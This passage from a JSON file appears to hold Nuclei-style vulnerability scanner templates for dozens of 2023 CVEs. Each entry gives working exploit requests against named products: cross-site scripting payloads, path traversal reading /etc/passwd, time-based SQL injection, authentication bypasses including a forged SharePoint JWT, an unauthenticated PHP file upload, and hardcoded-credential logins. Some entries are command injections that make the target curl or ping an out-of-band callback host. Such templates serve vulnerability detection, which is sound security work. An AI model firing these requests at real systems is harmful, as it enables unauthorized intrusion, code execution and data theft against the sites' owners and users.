Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-52251","info":{"name":"Kafka UI 0.7.1 Command Injection","severity":"high"},"requests":[{"raw":["GET /api/clusters HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"cluster-name","internal":true,"json":[".[0].name"]}]},{"raw":["GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"topic-name","internal":true,"json":[".topics[].name"]}]},{"raw":["@timeout 20s\nGET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Assigning partitions"]}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><svg onload=alert(document.domain)>\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39110","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"word","part":"body_1","words":["rConfig"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-37629","info":{"name":"Online Piggery Management System v1.0 - Unauthenticated File Upload","severity":"critical"},"requests":[{"raw":["POST /pig/add-pig.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigno\"\n\npig-fms-100\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"weight\"\n\n65465\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"arrived\"\n\n{{date_time(\"%Y-%M-%D\")}}\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"gender\"\n\nfemale\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"status\"\n\nactive\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"breed\"\n\n2\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"remark\"\n\n4fwefwe\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigphoto\"; filename=\"{{rand_base(5)}}\".php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"submit\"\n\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(content_type, \"text/html\")","contains(body, \"successfully created\")"],"condition":"and"}]}]},{"id":"CVE-2023-38964","info":{"name":"Academy LMS 6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/courses?query=\"><svg+onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<svg onload=alert(document.domain)>\", \"All courses</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-4547","info":{"name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331\"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB","{{BaseURL}}/search?filter[brandid]=vnxjb\"><script>alert(document.cookie)</script>bvu51"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["100-1331\"><script>alert(document.cookie)</script>","><script>alert(document.cookie)</script>bvu51"],"condition":"or"},{"type":"word","part":"body","words":["<table class=\"products-nav\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29204","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me","{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-39677","info":{"name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/simpleimportproduct/send.php?phpinfo=1","{{BaseURL}}/modules/updateproducts/send.php?phpinfo=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2023-4974","info":{"name":"Academy LMS 6.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 500","contains(body, \"Courses</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-29357","info":{"name":"Microsoft SharePoint - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer\n","GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nAuthorization: Bearer {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\nX-PROOF_TOKEN: {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\n"],"extractors":[{"type":"regex","part":"header","group":1,"name":"realm","regex":["realm=\"([^\"]*)\""],"internal":true},{"type":"json","json":[".value[].Email"]}],"matchers":[{"type":"word","part":"body_2","words":["LoginName","Email","IsSiteAdmin"],"condition":"and"}]}]},{"id":"CVE-2023-32068","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-45136","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/xwiki/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"<script>alert(document.domain)</script>\", \"data-xwiki-reference\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-5244","info":{"name":"Microweber < V.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"alert(document.domain)\", \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2023-4220","info":{"name":"Chamilo LMS <= 1.11.24 - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------SwxF5rRaZb4lETWlpulXn3\n\n--------------------------SwxF5rRaZb4lETWlpulXn3\nContent-Disposition: form-data; name=\"bigUploadFile\"; filename=\"{{filename}}.txt\"\nContent-Type: application/octet-stream\n\n{{md5(num)}}\n\n--------------------------SwxF5rRaZb4lETWlpulXn3--\n","GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,\"{{md5(num)}}\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel < 11.109.9999.116 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror=\"prompt(document.domain)\">"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-2059","info":{"name":"DedeCMS 5.7.87 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\\..\\..\\ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["dirname(__FILE__)","$cfg_basedir","dedecms"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2813","info":{"name":"Wordpress Multiple Themes - Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s={{str}}%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/{{random}}/"],"matchers-condition":"and","matchers":[{"type":"word","words":["<IMG SRC=/ onerror=\"alert(document.domain)\"></img>","wp-content/theme"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-40208","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["stock_ticker","onmousemove=alert(document.domain)"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38501","info":{"name":"CopyParty v1.8.6 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<img src=copyparty onerror=alert(document.domain)>\",\"\\\">go to\")"],"condition":"and"}]}]},{"id":"CVE-2023-42442","info":{"name":"JumpServer > 3.6.4 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/terminal/sessions/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"terminal\":","\"user_id\":\"","\"account_id\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30943","info":{"name":"Moodle - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"raw":["GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(document.domain)>.png HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /login/index.php HTTP/2\nHost: {{Hostname}}\n","POST /login/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n","GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(document.domain)>",">archive","File icon"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","part":"header_4","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-5222","info":{"name":"Viessmann Vitogate 300 - Hardcoded Password","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-login\",\"params\":{\"uid\":\"{{username}}\",\"pwd\":\"{{password}}\"}}\n"],"attack":"pitchfork","payloads":{"username":["vitomaster","vitogate"],"password":["viessmann1917","viessmann"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["admin\":true","\"sessionId\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26469","info":{"name":"Jorani 1.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /session/login HTTP/1.1\nHost: {{Hostname}}\n","POST /session/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword\n","GET /pages/view/log-{{date_time(\"%Y-%M-%D\")}} HTTP/1.1\nHost: {{Hostname}}\nX-REQUESTED-WITH: XMLHttpRequest\n{{header}}: CVE-2023-26469\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7cca0844e81cd333152def045fe075c2"]},{"type":"status","part":"header_3","status":[401]}],"extractors":[{"type":"regex","part":"body","group":1,"internal":true,"name":"csrf","regex":["name=\"csrf_test_jorani\" value=\"(.*?)\""]}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg onload=prompt(document.domain)>\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-4116","info":{"name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Passengers\", \"Drop-off address\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-4110","info":{"name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Booking\", \"Arrival\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-1880","info":{"name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"phpmyfaq\") && contains(body, \"<script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-22463","info":{"name":"KubePi JwtSigKey - Admin Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /kubepi/api/v1/users HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n\n{\n  \"authenticate\": {\n       \"password\": \"{{password}}\"\n  },\n  \"email\": \"{{email}}\",\n  \"isAdmin\": true,\n  \"mfa\": {\n          \"enable\": false\n   },\n  \"name\": \"{{name}}\",\n  \"nickName\": \"{{nickname}}\",\n  \"roles\": [\n  ]\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"password\":","\"isAdmin\":","\"createAt\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n   \"token\":\"{{token}}\",\n   \"details\":{\n      \"details\":{\n         \"subprotocol\":\"h2\",\n         \"classname\":\"org.h2.Driver\",\n         \"advanced-options\":true,\n         \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n      },\n      \"name\":\"{{randstr}}\",\n      \"engine\":\"postgres\"\n   }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-27034","info":{"name":"Blind SQL injection vulnerability in Jms Blog","severity":"critical"},"requests":[{"raw":["@timeout: 12s\nPOST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\nHost: {{Hostname}}\nConnection: Keep-alive\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"comment\"\n\n555\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"customer_name\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email\"\n\n0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id_comment_reply\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"submitComment\"\n\nsubmitComment=\n------------YWJkMTQzNDcw--\n","GET /modules/jmsblog/config.xml HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(body_2, \"Jms Blog\")"],"condition":"and"}]}]},{"id":"CVE-2023-3845","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-26035","info":{"name":"ZoneMinder Snapshots - Command Injection","severity":"critical"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrfMagicToken = \\\"(key:[a-f0-9]{40},\\d+)"],"internal":true}]},{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nview=snapshot&action=create&monitor_ids[0][Id]=;ping+{{interactsh-url}}&__csrf_magic={{csrf_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")"]}]}]},{"id":"CVE-2023-45855","info":{"name":"qdPM 9.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uploads/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /uploads</title>","attachments/</a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-45671","info":{"name":"Frigate < 0.13.0 Beta 3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["contains(body, \"Camera named <img src=\\\"\\\" onerror=alert(document.domain)>\")","contains(header, \"text/html\")","status_code == 404"],"condition":"and"}]}]},{"id":"CVE-2023-34755","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&action=edit HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 